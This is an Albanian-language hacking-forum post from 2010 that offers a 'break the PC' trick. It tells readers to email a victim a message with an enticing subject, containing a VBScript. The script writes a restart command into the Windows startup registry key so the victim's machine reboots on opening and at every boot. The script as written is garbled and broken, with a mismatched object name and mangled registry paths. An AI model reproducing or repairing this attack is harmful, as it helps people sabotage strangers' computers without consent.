prish pc

Shko poshtë

prish pc

Mesazh  EliTe Crew prej Sun Jun 13, 2010 12:18 pm

Prish pc-n Mbrapa Code te cilat e shkymin kompjuterin edhe code te tjera

Hym ne emailin tone ne Hotmail dhe shkojme dhe krijojme nje mesazh te ri!

Shenojme emailin e viktimes dhe ne titullin(subject) shenojme dicka atraktive dhe ne pjesen ku e shenojm mesazhin shenojme ket:

--------------------------------------------------------------------------

******** ****************="vbscript"> on error resume next dim ok

set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32","shutdown -r"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32","shutdown -r"

</SCRIPT>

--------------------------------------------------------------------------

Viktima me hapjen e ketij emaili, ne funksion do te hyn kodi qe eshe pakme nalt, do ti shkymet kompjuteri! dhe cdoher kur te Starton kopmjuterin!

per 24 sekonda do ti shymet.

EliTe Crew

Numri i postimeve : 158
Join date : 13/06/2010
Age : 26
Location : united cracker group

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Mbrapsht në krye

- Similar topics

 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi